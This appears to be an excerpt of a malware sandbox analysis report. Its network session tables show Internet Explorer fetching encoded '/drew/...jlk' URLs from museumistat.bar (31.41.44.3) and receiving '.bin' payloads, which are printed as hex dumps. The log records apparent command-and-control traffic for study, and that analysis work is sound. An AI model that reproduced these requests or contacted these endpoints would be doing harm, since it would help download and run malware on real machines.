                  Data Raw: 53 69 37 30 45 70 58 46 33 44 74 4b 45 54 52 70 2b 5a 47 59 32 54 78 45 4a 6d 41 74 33 51 6f 74 4f 49 36 65 38 6e 69 54 30 43 45 51 77 6d 55 4b 39 6e 77 53 4b 49 44 6d 38 59 79 33 49 58 48 75 71 53 6a 4a 65 36 58 6d 48 4e 79 44 4d 2b 72 66 39 51 6e 53 78 4a 46 4b 49 50 39 74 52 52 73 6f 6b 49 45 78 4d 46 51 70 43 4f 55 38 55 4a 64 39 31 4d 31 53 6a 54 66 62 6c 69 45 4b 2b 68 41 7a 6c 37 42 6a 5a 32 30 57 42 70 49 50 2b 53 6d 77 56 70 69 31 67 62 72 55 4b 50 42 52 56 50 6f 64 77 37 44 5a 35 6c 62 4c 7a 4b 6f 48 54 65 34 5a 54 76 42 6c 53 42 70 75 6a 54 45 75 4d 72 2f 44 30 44 38 39 6a 4d 6d 7a 4a 70 62 68 44 48 57 65 70 62 35 78 63 75 78 5a 72 4b 5a 65 51 47 33 43 4a 6d 41 6e 35 4a 69 53 38 69 63 33 66 74 74 70 6a 6a 49 4a 33 59 70 73 61 6b 45 75 46 51 59 6c 4e 78 68 42 2b 32 49 62 46 2f 71 4e 73 77 49 2f 49 64 7a 6c 57 52 46 42 62 54 4d 7a 47 66 31 62 4e 79 36 76 31 4b 79 34 51 56 36 65 4a 77 4e 6a 73 6c 6c 4c 30 39 69 50 6b 78 30 52 76 59 37 75 64 7a 33 31 30 55 7a 66 7a 6d 68 46 4c 65 46 41 59 37 79 74 6c 37 35 7a 59 48 6c 54 55 69 2b 30 4f 6e 4c 57 45 63 38 46 75 73 61 6e 6d 2b 57 46 73 79 56 56 44 59 75 68 66 62 5a 69 4a 63 6e 44 4b 57 31 43 54 6a 61 38 49 37 53 71 76 51 35 52 59 4d 46 47 43 68 6d 4b 34 58 47 2b 63 6e 38 76 64 76 77 47 77 39 51 32 61 37 69 4d 79 77 47 32 67 56 69 6c 47 63 73 32 2b 66 6c 45 43 67 56 52 62 44 4e 67 6f 2f 30 36 6d 33 4e 42 74 73 54 45 42 74 63 64 49 4c 46 49 2f 30 6b 52 4e 38 4c 58 76 71 5a 4a 65 2b 65 4c 39 5a 61 58 2f 5a 35 6d 47 77 55 45 2b 2b 6a 76 45 51 4f 64 6d 71 34 47 71 33 64 6d 49 73 42 57 79 45 72 50 62 59 30 4c 7a 56 79 6f 45 79 49 41 51 42 74 38 67 2b 72 73 7a 6c 6c 61 58 38 69 32 34 45 55 49 44 69 74 5a 49 41 48 43 4d 70 78 33 56 55 53 75 76 6b 6a 61 43 2f 2f 75 7a 43 65 53 6a 6c 36 66 78 4b 67 30 70 55 62 63 4e 6f 54 52 44 67 67 38 42 35 58 65 50 38 78 69 4b 5a 36 52 44 6f 62 6e 35 65 33 55 2b 58 69 45 49 6d 52 56 4a 65 78 6f 55 63 65 46 49 72 30 69 6e 2f 42 35 62 30 6a 39 62 75 6a 6e 61 
34 30 72 78 57 50 39 6a 4b 37 57 68 30 65 56 53 45 7a 30 52 56 41 43 34 6a 46 32 54 37 75 4d 38 41 34 59 4c 68 70 57 59 35 56 33 4c 4d 37 4e 47 76 6f 61 41 6f 70 35 4d 45 6b 72 37 53 57 43 39 4d 69 45 42 31 43 4a 48 63 32 57 4b 6e 76 37 75 37 69 2f 53 4d 52 77 75 72 6a 6f 76 34 4d 57 79 4d 46 70 73 2f 73 62 30 2b 48 6e 7a 37 47 36 41 61 34 48 32 67 65 33 34 69 7a 34 36 4e 43 4b 43 6a 4d 51 72 73 38 72 75 55 4a 6e 70 54 59 32 4a 74 56 48 73 44 68 39 67 2b 74 32 47 78 55 37 6e 45 2f 79 64 59 69 6a 70 74 47 50 34 59 33 67 52 76 5a 4e 5a 52 56 46 71 6a 79 46 45 37 48 71 71 39 6c 52 65 58 4a 4d 4f 73 68 71 33 33 47 2f 73 39 50 67 37 66 31 4c 71 53 6b 6a 36 31 54 42 4f 38 6f 47 58 38 31 45 69 68 78 69 30 51 77 73 70 71 41 4f 31 66 47 35 62 68 54 43 45 49 61 57 30 53 70 43 67 43 35 6a 48 61 41 45 49 64 56 65 41 55 55 32 44 6f 52 37 5a 72 66 75 41 54 6c 6d 42 2f 4a 67 52 38 2b 6c 7a 55 51 75 64 79 6d 72 35 53 79 52 41 4e 57 4a 5a 56 66 73 32 31 31 73 58 6f 41 56 58 45 42 6b 76 49 77 36 64 37 35 30 73 75 55 47 76


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  3 | 192.168.2.3 | 49754 | 31.41.44.3 | 80 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Jan 19, 2022 11:50:32.735749960 CET | 1706 | OUT | GET /drew/m4PVNjgat1g0/6_2Btp70Ci0/aungsV13kBUs5a/u2A8XHXxV0G6qtvrny9S2/1bGzk7HyzbfK_2FU/H_2BzwQBI0CSjs2/U1xYaVr4zjQvZiLchv/4aLCBz0CM/68jv0usMkhT2JOF9ESfc/julfpSuq9tErtsl1vT0/5cBxjWFbHYxsgooRJoWIHy/X7bt5vrbFueOy/GXHEBf2y/a48Hwj5cem9DF_2FgVMHxJc/2BxgNa1_2B/9wP6Mz_2F/66hqNdd.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Host: museumistat.bar
                  Connection: Keep-Alive
                  Jan 19, 2022 11:50:33.052546024 CET | 1720 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.10.3 (Ubuntu)
                  Date: Wed, 19 Jan 2022 10:50:33 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 246652
                  Connection: keep-alive
                  Pragma: public
                  Accept-Ranges: bytes
                  Expires: 0
                  Cache-Control: must-revalidate, post-check=0, pre-check=0
                  Content-Disposition: inline; filename="61e7ecf8f3a99.bin"
                  Data Raw: 51 59 47 5a 59 79 39 48 57 2f 73 4e 35 51 6a 64 42 41 75 6e 54 4e 71 74 75 73 6d 32 4c 43 54 4e 33 4c 65 52 49 53 65 79 78 6e 48 74 67 31 30 6e 6a 6e 52 69 48 78 38 4c 69 67 65 37 2b 7a 51 4c 32 57 38 65 39 61 75 43 61 4a 41 70 64 41 2b 43 34 56 52 31 38 6a 37 38 63 5a 32 6d 50 65 4f 59 75 76 61 51 44 35 52 67 36 54 4d 33 41 41 74 74 58 64 5a 74 64 62 42 42 36 79 6b 6d 4f 30 77 75 47 6a 75 42 59 39 6c 47 45 2b 70 4a 45 74 56 74 45 38 4c 6b 56 72 57 59 76 34 6d 78 67 31 42 51 4e 57 59 72 6c 6f 78 63 77 69 54 32 2b 37 64 2b 74 79 59 58 69 6f 76 70 55 6f 53 6f 4c 51 54 4c 2b 66 32 45 79 62 6a 58 31 45 33 72 4d 65 34 54 36 46 2b 52 42 4a 50 55 57 76 31 50 31 4a 4a 66 70 50 63 2f 41 72 32 36 48 34 2f 66 4d 69 65 6f 6c 64 61 45 65 45 36 4f 5a 61 79 65 61 4a 39 65 49 78 4e 44 4f 37 44 37 63 2f 52 77 2f 67 30 72 74 4a 5a 42 64 35 37 48 38 73 6e 51 56 54 34 35 6b 43 65 74 4c 51 68 4a 49 4e 33 6f 2f 73 7a 6b 41 4e 45 55 42 36 61 49 50 68 51 73 42 4e 6a 52 63 59 79 4c 63 31 33 33 71 30 79 7a 45 6f 79 6b 79 6f 66 72 54 72 54 51 34 51 6f 48 54 39 32 31 4f 68 64 49 37 4e 30 71 49 65 7a 62 77 43 66 71 54 38 56 46 63 43 32 33 59 6a 58 5a 37 5a 56 55 46 5a 75 49 49 6c 39 30 59 39 4b 75 79 76 53 36 35 75 36 58 67 7a 4e 51 74 35 48 4d 47 4f 46 59 70 6d 66 6c 4f 69 66 68 2b 49 7a 41 4d 72 54 30 33 49 71 54 43 50 64 4f 68 57 45 70 6a 62 6b 4a 63 35 6b 4b 75 55 51 73 51 6c 61 52 6f 55 33 36 49 41 56 33 6f 68 42 6e 31 49 6d 49 46 59 32 6c 65 71 52 35 54 6c 51 39 5a 4f 48 61 45 48 61 36 51 4e 67 6e 45 47 36 78 62 6e 4e 4a 32 2b 55 59 37 4a 69 44 69 51 6a 42 5a 72 43 62 37 2b 47 68 78 6e 5a 53 46 68 74 66 41 63 4d 55 32 58 63 47 77 77 56 32 75 4a 6f 49 78 74 37 76 4c 38 46 39 54 6c 68 52 4d 6d 41 2f 52 7a 52 36 56 74 38 78 5a 66 39 52 6b 52 33 65 31 70 39 74 6f 46 5a 33 6f 34 63 48 59 55 76 33 49 6e 57 43 71 50 73 42 6e 6f 6a 48 38 78 45 4d 30 56 62 6a 68 65 42 58 6f 61 78 68 42 51 39 5a 36 2f 66 78 6e 2f 32 48 63 58 72 62 31 63 38 69 62 36 6c 75 45 4b 6e 57 64 
43 4c 36 75 7a 6c 48 7a 63 42 6b 4d 61 4f 44 44 30 59 5a 63 70 6b 69 57 73 2f 36 73 67 59 49 61 46 33 64 59 6f 52 5a 51 59 44 55 52 4e 36 76 4c 7a 42 74 58 74 5a 4d 42 61 55 57 72 6f 68 51 64 54 64 6e 34 75 7a 4a 6a 63 6e 77 42 4c 6e 76 50 79 4f 2b 54 46 75 43 4e 6a 58 4d 69 54 32 47 79 2f 6a 2f 48 70 33 6c 57 58 66 52 48 6f 6a 6a 65 68 70 4f 63 4a 61 70 57 69 75 70 6e 61 64 62 71 75 78 47 6e 36 30 58 68 6c 45 61 77 4a 63 62 30 70 39 73 74 79 7a 4d 36 6f 63 61 43 41 64 74 4f 56 74 76 48 48 37 4e 65 52 51 74 73 2b 68 4a 35 47 50 38 30 56 76 31 5a 63 2f 58 72 33 6c 55 6c 6a 4f 31 64 75 74 79 76 6a 37 72 75 64 72 36 67 6a 69 39 56 31 45 6a 31 35 32 75 65 51 77 55 41 33 68 6a 43 4d 64 70 47 47 78 72 6e 57 63 78 71 50 54 74 49 71 53 47 36 51 56 56 38 70 75 5a 50 53 56 35 4b 38 75 44 46 43 53 31 51 2f 4a 63 45 2b 76 6c 73 54 52 50 74 49 43 48 72 75 34 44 38 4b 4e 2f 67 4e 66 6d 4c 59 36 4b 6c 59 30 77 2f 75 55 61 35 61 48 45 6a 68 61 44 6c 56 62 6f 2b 4e 7a 30 51 56 6e 2b 48 45 2f 6d 4c 37 6f 72 37 67 44
                  Jan 19, 2022 11:50:34.932451010 CET | 2229 | OUT | GET /drew/WscgLp0a9mza4KVSZP_2F/qW_2BiGKRm2pEjNT/0yit17kTcYKALfY/Dca3d6njS6Q8Up7_2B/S1Q5c3m1L/htfRX_2FNP4zOUbJdHE0/XcLw_2FUradRuvSZYkz/0N0BHZth_2BNigSkIsxFbw/Kr0gcIwYitNQb/vtve9mnb/uJ6GCaAgncMj3aalqD8JgFA/MTnXx5EVkL/iZOp4aPFrTK2CzYfp/vJg2ovriq7si/LWFvH6yBaQn/MYMUZGLdg/H3Ww.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Host: museumistat.bar
                  Connection: Keep-Alive
                  Jan 19, 2022 11:50:35.253115892 CET | 2437 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.10.3 (Ubuntu)
                  Date: Wed, 19 Jan 2022 10:50:35 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 315596
                  Connection: keep-alive
                  Pragma: public
                  Accept-Ranges: bytes
                  Expires: 0
                  Cache-Control: must-revalidate, post-check=0, pre-check=0
                  Content-Disposition: inline; filename="61e7ecfb30839.bin"
                  Data Raw: 65 57 49 79 65 68 39 31 50 42 42 6e 31 56 6a 36 65 34 4d 6f 4e 62 59 6d 76 6c 58 30 4e 30 4b 6f 6f 34 4a 33 76 41 47 76 31 69 5a 61 7a 7a 50 34 46 48 38 39 6c 4a 63 78 30 2f 74 36 70 58 36 57 67 53 77 6c 72 6a 68 4d 74 42 37 47 72 65 7a 4e 66 37 73 4e 30 64 6c 44 69 6b 70 65 5a 33 2b 44 35 2f 64 2f 50 6e 37 5a 33 6a 30 6a 51 33 79 49 66 6e 32 63 71 4f 6e 35 41 66 5a 61 63 31 31 4e 4a 79 57 68 74 55 76 6a 4e 42 42 42 51 63 6a 5a 67 73 48 48 62 75 33 74 4c 2b 62 63 55 43 4a 5a 42 72 37 59 57 48 41 6f 63 2f 79 7a 32 65 75 67 4a 79 71 79 4f 30 42 6a 64 33 53 59 52 4c 63 56 74 53 62 4f 61 46 33 5a 39 70 63 30 2b 50 70 4b 71 73 6c 73 73 6d 51 6e 64 49 59 55 2b 73 72 30 35 35 77 6e 5a 44 61 6e 69 4f 56 71 30 46 46 48 65 6a 59 66 4d 4d 38 74 53 43 41 50 6d 6b 4f 73 4c 4d 6f 54 6b 36 37 66 68 54 53 47 47 6e 2f 59 2f 43 41 72 57 58 51 69 79 4d 4d 47 74 4b 39 4f 48 59 63 41 30 78 57 47 62 73 78 7a 4e 70 42 6d 68 4c 49 79 59 41 2f 73 73 7a 6b 6e 32 52 67 4f 59 61 39 65 52 67 56 7a 71 75 42 2b 63 47 41 4a 4a 51 49 4a 66 6d 4d 33 73 6f 4d 50 30 6e 78 6e 33 52 48 6f 43 63 4c 37 65 56 63 53 59 43 34 6f 51 64 4d 2b 34 6d 75 46 6e 4b 6a 35 52 5a 62 2b 52 67 43 50 6f 52 74 61 62 31 77 66 63 32 4a 46 57 58 66 2f 6b 78 58 46 34 2f 2b 38 34 32 42 65 44 53 2b 78 32 43 36 61 65 5a 4a 6a 37 6f 63 79 4f 72 54 66 64 77 58 56 56 34 39 47 56 36 41 4f 77 6e 70 42 46 76 2f 62 68 71 65 64 4a 53 59 57 64 4c 56 35 67 59 6c 48 54 44 36 57 67 62 64 75 71 37 46 47 56 70 59 48 53 61 6c 72 4b 7a 4d 38 59 61 67 62 49 79 6b 48 48 33 6c 2b 68 6f 4a 71 6a 6c 5a 32 51 33 56 4e 58 2b 4b 6e 67 58 38 32 63 4e 6c 43 2b 43 69 41 47 57 59 48 34 48 2f 53 74 66 37 45 47 66 36 50 31 68 61 4a 79 36 79 4f 76 57 45 33 54 77 75 6a 76 67 76 56 6d 4b 72 5a 69 47 58 75 57 42 4b 38 6c 43 4e 6f 6d 47 66 77 54 6e 46 45 79 7a 48 74 58 73 43 58 31 46 38 74 32 69 50 32 72 79 6b 6d 72 30 49 33 77 4c 5a 73 71 4c 43 75 48 2f 54 72 53 51 39 41 6a 4c 53 6d 4f 75 43 74 38 58 53 35 5a 6c 79 31 4c 53 7a 45 79 
61 61 7a 36 78 56 31 66 57 6b 48 71 70 31 62 4c 76 53 77 54 63 66 4b 37 2f 32 54 6d 66 2b 42 36 58 34 63 6f 57 57 30 43 44 4f 2f 33 72 79 70 34 78 72 38 43 64 56 71 78 45 6b 4c 61 66 6f 63 61 67 42 2b 48 6e 5a 71 35 6a 68 49 70 34 4c 4f 52 39 46 71 6d 56 4b 38 61 52 57 38 68 41 69 52 4f 57 42 2b 6c 46 50 4a 6b 54 71 73 30 6a 39 4f 68 46 47 74 39 41 4c 4f 62 35 33 64 59 64 39 33 45 32 5a 6f 55 4d 69 58 68 64 56 68 2b 73 65 4f 43 62 50 4a 32 4b 49 79 4d 57 48 4a 4c 38 62 2b 30 78 52 31 4c 56 38 74 5a 70 58 58 78 4b 75 79 46 32 39 49 63 33 6b 49 41 70 4d 4e 76 70 66 32 61 56 6d 6b 4e 5a 39 78 69 75 74 4e 78 30 31 6e 2f 48 72 6e 54 6a 56 78 47 59 58 44 50 43 59 4a 6b 6d 38 35 6c 74 30 4a 43 6f 79 2b 2b 72 79 42 6c 78 35 71 37 6d 33 44 45 79 41 42 42 4e 6d 2f 4b 38 78 49 50 4b 63 6b 65 4a 4d 50 6c 6a 68 4f 63 57 63 6e 53 38 64 43 4e 31 62 6b 37 6b 4e 69 54 62 30 4f 32 74 48 62 4b 4d 4b 4c 33 43 61 71 68 47 7a 47 47 51 4d 4e 54 44 6f 72 45 73 57 4b 44 64 2b 33 38 57 36 75 73 69 6d 4b 35 51 2f 41 39 41 37
                  Jan 19, 2022 11:50:37.431406021 CET | 3159 | OUT | GET /drew/9blP_2FAE_2FFwEHiHE7/YS8VB72J_2FAJJllSzs/fyphXYY7W5oXrGE4G68BTo/K6uxe0s8owaZT/sJxgOiGF/toQb9bzuaSQoxlM767HxEUz/ojykuv_2Fm/zAlx3F69HisyQxGCo/YrZLBqFxHDh8/rWHutgpt4HV/9AGOgb99_2BjD6/GPBMSBdUStdt1oIDAqsXJ/Zv_2BHFepXyMKGeg/AYLFYPerTsZQFJf/UksyhZMrYb3d23pSok/_2BcgBxCR/B.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Host: museumistat.bar
                  Connection: Keep-Alive
                  Jan 19, 2022 11:50:37.757834911 CET | 3161 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.10.3 (Ubuntu)
                  Date: Wed, 19 Jan 2022 10:50:37 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 2416
                  Connection: keep-alive
                  Pragma: public
                  Accept-Ranges: bytes
                  Expires: 0
                  Cache-Control: must-revalidate, post-check=0, pre-check=0
                  Content-Disposition: inline; filename="61e7ecfdaae1b.bin"
                  Data Raw: 53 69 37 30 45 70 58 46 33 44 74 4b 45 54 52 70 2b 5a 47 59 32 54 78 45 4a 6d 41 74 33 51 6f 74 4f 49 36 65 38 6e 69 54 30 43 45 51 77 6d 55 4b 39 6e 77 53 4b 49 44 6d 38 59 79 33 49 58 48 75 71 53 6a 4a 65 36 58 6d 48 4e 79 44 4d 2b 72 66 39 51 6e 53 78 4a 46 4b 49 50 39 74 52 52 73 6f 6b 49 45 78 4d 46 51 70 43 4f 55 38 55 4a 64 39 31 4d 31 53 6a 54 66 62 6c 69 45 4b 2b 68 41 7a 6c 37 42 6a 5a 32 30 57 42 70 49 50 2b 53 6d 77 56 70 69 31 67 62 72 55 4b 50 42 52 56 50 6f 64 77 37 44 5a 35 6c 62 4c 7a 4b 6f 48 54 65 34 5a 54 76 42 6c 53 42 70 75 6a 54 45 75 4d 72 2f 44 30 44 38 39 6a 4d 6d 7a 4a 70 62 68 44 48 57 65 70 62 35 78 63 75 78 5a 72 4b 5a 65 51 47 33 43 4a 6d 41 6e 35 4a 69 53 38 69 63 33 66 74 74 70 6a 6a 49 4a 33 59 70 73 61 6b 45 75 46 51 59 6c 4e 78 68 42 2b 32 49 62 46 2f 71 4e 73 77 49 2f 49 64 7a 6c 57 52 46 42 62 54 4d 7a 47 66 31 62 4e 79 36 76 31 4b 79 34 51 56 36 65 4a 77 4e 6a 73 6c 6c 4c 30 39 69 50 6b 78 30 52 76 59 37 75 64 7a 33 31 30 55 7a 66 7a 6d 68 46 4c 65 46 41 59 37 79 74 6c 37 35 7a 59 48 6c 54 55 69 2b 30 4f 6e 4c 57 45 63 38 46 75 73 61 6e 6d 2b 57 46 73 79 56 56 44 59 75 68 66 62 5a 69 4a 63 6e 44 4b 57 31 43 54 6a 61 38 49 37 53 71 76 51 35 52 59 4d 46 47 43 68 6d 4b 34 58 47 2b 63 6e 38 76 64 76 77 47 77 39 51 32 61 37 69 4d 79 77 47 32 67 56 69 6c 47 63 73 32 2b 66 6c 45 43 67 56 52 62 44 4e 67 6f 2f 30 36 6d 33 4e 42 74 73 54 45 42 74 63 64 49 4c 46 49 2f 30 6b 52 4e 38 4c 58 76 71 5a 4a 65 2b 65 4c 39 5a 61 58 2f 5a 35 6d 47 77 55 45 2b 2b 6a 76 45 51 4f 64 6d 71 34 47 71 33 64 6d 49 73 42 57 79 45 72 50 62 59 30 4c 7a 56 79 6f 45 79 49 41 51 42 74 38 67 2b 72 73 7a 6c 6c 61 58 38 69 32 34 45 55 49 44 69 74 5a 49 41 48 43 4d 70 78 33 56 55 53 75 76 6b 6a 61 43 2f 2f 75 7a 43 65 53 6a 6c 36 66 78 4b 67 30 70 55 62 63 4e 6f 54 52 44 67 67 38 42 35 58 65 50 38 78 69 4b 5a 36 52 44 6f 62 6e 35 65 33 55 2b 58 69 45 49 6d 52 56 4a 65 78 6f 55 63 65 46 49 72 30 69 6e 2f 42 35 62 30 6a 39 62 75 6a 6e 61 
34 30 72 78 57 50 39 6a 4b 37 57 68 30 65 56 53 45 7a 30 52 56 41 43 34 6a 46 32 54 37 75 4d 38 41 34 59 4c 68 70 57 59 35 56 33 4c 4d 37 4e 47 76 6f 61 41 6f 70 35 4d 45 6b 72 37 53 57 43 39 4d 69 45 42 31 43 4a 48 63 32 57 4b 6e 76 37 75 37 69 2f 53 4d 52 77 75 72 6a 6f 76 34 4d 57 79 4d 46 70 73 2f 73 62 30 2b 48 6e 7a 37 47 36 41 61 34 48 32 67 65 33 34 69 7a 34 36 4e 43 4b 43 6a 4d 51 72 73 38 72 75 55 4a 6e 70 54 59 32 4a 74 56 48 73 44 68 39 67 2b 74 32 47 78 55 37 6e 45 2f 79 64 59 69 6a 70 74 47 50 34 59 33 67 52 76 5a 4e 5a 52 56 46 71 6a 79 46 45 37 48 71 71 39 6c 52 65 58 4a 4d 4f 73 68 71 33 33 47 2f 73 39 50 67 37 66 31 4c 71 53 6b 6a 36 31 54 42 4f 38 6f 47 58 38 31 45 69 68 78 69 30 51 77 73 70 71 41 4f 31 66 47 35 62 68 54 43 45 49 61 57 30 53 70 43 67 43 35 6a 48 61 41 45 49 64 56 65 41 55 55 32 44 6f 52 37 5a 72 66 75 41 54 6c 6d 42 2f 4a 67 52 38 2b 6c 7a 55 51 75 64 79 6d 72 35 53 79 52 41 4e 57 4a 5a 56 66 73 32 31 31 73 58 6f 41 56 58 45 42 6b 76 49 77 36 64 37 35 30 73 75 55 47 76
                  Jan 19, 2022 11:50:42.294394016 CET | 3515 | OUT | GET /drew/VV_2BwS8Vr7FLZE_2Bx/hn00HRykakafUORzXuronm/S2NceGwHyG0lw/75DrHXVA/R1_2F_2Fj4Y_2FxlTCM7oLQ/KdAvtV7PTd/INtjv0kJxFO5LBByA/6IEADuWC8M_2/BC2pEweOA_2/FLFj0zJxXN5f0_/2FXT1i0K56I9LZMvALSyv/P7hw8vY32OG3jn28/BOFJl0FutRVUckU/Qu6XnvXUiNRUBGVYb6/29y_2F1_2/FgyW49mKvtH4XdHIh58L/Va1en8p.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Host: museumistat.bar
                  Connection: Keep-Alive
                  Jan 19, 2022 11:50:42.620764971 CET | 3517 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.10.3 (Ubuntu)
                  Date: Wed, 19 Jan 2022 10:50:42 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 2416
                  Connection: keep-alive
                  Pragma: public
                  Accept-Ranges: bytes
                  Expires: 0
                  Cache-Control: must-revalidate, post-check=0, pre-check=0
                  Content-Disposition: inline; filename="61e7ed0289129.bin"
                  Data Raw: 53 69 37 30 45 70 58 46 33 44 74 4b 45 54 52 70 2b 5a 47 59 32 54 78 45 4a 6d 41 74 33 51 6f 74 4f 49 36 65 38 6e 69 54 30 43 45 51 77 6d 55 4b 39 6e 77 53 4b 49 44 6d 38 59 79 33 49 58 48 75 71 53 6a 4a 65 36 58 6d 48 4e 79 44 4d 2b 72 66 39 51 6e 53 78 4a 46 4b 49 50 39 74 52 52 73 6f 6b 49 45 78 4d 46 51 70 43 4f 55 38 55 4a 64 39 31 4d 31 53 6a 54 66 62 6c 69 45 4b 2b 68 41 7a 6c 37 42 6a 5a 32 30 57 42 70 49 50 2b 53 6d 77 56 70 69 31 67 62 72 55 4b 50 42 52 56 50 6f 64 77 37 44 5a 35 6c 62 4c 7a 4b 6f 48 54 65 34 5a 54 76 42 6c 53 42 70 75 6a 54 45 75 4d 72 2f 44 30 44 38 39 6a 4d 6d 7a 4a 70 62 68 44 48 57 65 70 62 35 78 63 75 78 5a 72 4b 5a 65 51 47 33 43 4a 6d 41 6e 35 4a 69 53 38 69 63 33 66 74 74 70 6a 6a 49 4a 33 59 70 73 61 6b 45 75 46 51 59 6c 4e 78 68 42 2b 32 49 62 46 2f 71 4e 73 77 49 2f 49 64 7a 6c 57 52 46 42 62 54 4d 7a 47 66 31 62 4e 79 36 76 31 4b 79 34 51 56 36 65 4a 77 4e 6a 73 6c 6c 4c 30 39 69 50 6b 78 30 52 76 59 37 75 64 7a 33 31 30 55 7a 66 7a 6d 68 46 4c 65 46 41 59 37 79 74 6c 37 35 7a 59 48 6c 54 55 69 2b 30 4f 6e 4c 57 45 63 38 46 75 73 61 6e 6d 2b 57 46 73 79 56 56 44 59 75 68 66 62 5a 69 4a 63 6e 44 4b 57 31 43 54 6a 61 38 49 37 53 71 76 51 35 52 59 4d 46 47 43 68 6d 4b 34 58 47 2b 63 6e 38 76 64 76 77 47 77 39 51 32 61 37 69 4d 79 77 47 32 67 56 69 6c 47 63 73 32 2b 66 6c 45 43 67 56 52 62 44 4e 67 6f 2f 30 36 6d 33 4e 42 74 73 54 45 42 74 63 64 49 4c 46 49 2f 30 6b 52 4e 38 4c 58 76 71 5a 4a 65 2b 65 4c 39 5a 61 58 2f 5a 35 6d 47 77 55 45 2b 2b 6a 76 45 51 4f 64 6d 71 34 47 71 33 64 6d 49 73 42 57 79 45 72 50 62 59 30 4c 7a 56 79 6f 45 79 49 41 51 42 74 38 67 2b 72 73 7a 6c 6c 61 58 38 69 32 34 45 55 49 44 69 74 5a 49 41 48 43 4d 70 78 33 56 55 53 75 76 6b 6a 61 43 2f 2f 75 7a 43 65 53 6a 6c 36 66 78 4b 67 30 70 55 62 63 4e 6f 54 52 44 67 67 38 42 35 58 65 50 38 78 69 4b 5a 36 52 44 6f 62 6e 35 65 33 55 2b 58 69 45 49 6d 52 56 4a 65 78 6f 55 63 65 46 49 72 30 69 6e 2f 42 35 62 30 6a 39 62 75 6a 6e 61 
34 30 72 78 57 50 39 6a 4b 37 57 68 30 65 56 53 45 7a 30 52 56 41 43 34 6a 46 32 54 37 75 4d 38 41 34 59 4c 68 70 57 59 35 56 33 4c 4d 37 4e 47 76 6f 61 41 6f 70 35 4d 45 6b 72 37 53 57 43 39 4d 69 45 42 31 43 4a 48 63 32 57 4b 6e 76 37 75 37 69 2f 53 4d 52 77 75 72 6a 6f 76 34 4d 57 79 4d 46 70 73 2f 73 62 30 2b 48 6e 7a 37 47 36 41 61 34 48 32 67 65 33 34 69 7a 34 36 4e 43 4b 43 6a 4d 51 72 73 38 72 75 55 4a 6e 70 54 59 32 4a 74 56 48 73 44 68 39 67 2b 74 32 47 78 55 37 6e 45 2f 79 64 59 69 6a 70 74 47 50 34 59 33 67 52 76 5a 4e 5a 52 56 46 71 6a 79 46 45 37 48 71 71 39 6c 52 65 58 4a 4d 4f 73 68 71 33 33 47 2f 73 39 50 67 37 66 31 4c 71 53 6b 6a 36 31 54 42 4f 38 6f 47 58 38 31 45 69 68 78 69 30 51 77 73 70 71 41 4f 31 66 47 35 62 68 54 43 45 49 61 57 30 53 70 43 67 43 35 6a 48 61 41 45 49 64 56 65 41 55 55 32 44 6f 52 37 5a 72 66 75 41 54 6c 6d 42 2f 4a 67 52 38 2b 6c 7a 55 51 75 64 79 6d 72 35 53 79 52 41 4e 57 4a 5a 56 66 73 32 31 31 73 58 6f 41 56 58 45 42 6b 76 49 77 36 64 37 35 30 73 75 55 47 76


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  4 | 192.168.2.3 | 49756 | 31.41.44.3 | 80 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Jan 19, 2022 11:50:36.361098051 CET | 2893 | OUT | GET /drew/ml7QN9H69bQc_2FqcErn/JWHN_2F1D_2FeQ7F2rf/oeEjPxzB_2Fw_2F8MEJzC6/5gAnzEpRNXWFk/64j4iITJ/jnOThCTb9WelDC2Av_2F9i8/VHepa0UCDh/KFl9Z1ZbYspbJ4E8_/2BzgcxaTppah/d9hJDFKgAt8/5U8WBthgJgfyxM/8RFDoFNHkI_2FZphi7QxP/YaWR2kATqPAKO_2B/PJwm2MPaqbbSQg_/2BLvMKsgjJPPYLJl45/I0CzZhv6_2FCZxS/FG1.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Host: museumistat.bar
                  Connection: Keep-Alive
                  Jan 19, 2022 11:50:36.689474106 CET | 2895 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.10.3 (Ubuntu)
                  Date: Wed, 19 Jan 2022 10:50:36 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 246652
                  Connection: keep-alive
                  Pragma: public
                  Accept-Ranges: bytes
                  Expires: 0
                  Cache-Control: must-revalidate, post-check=0, pre-check=0
                  Content-Disposition: inline; filename="61e7ecfc9b07f.bin"
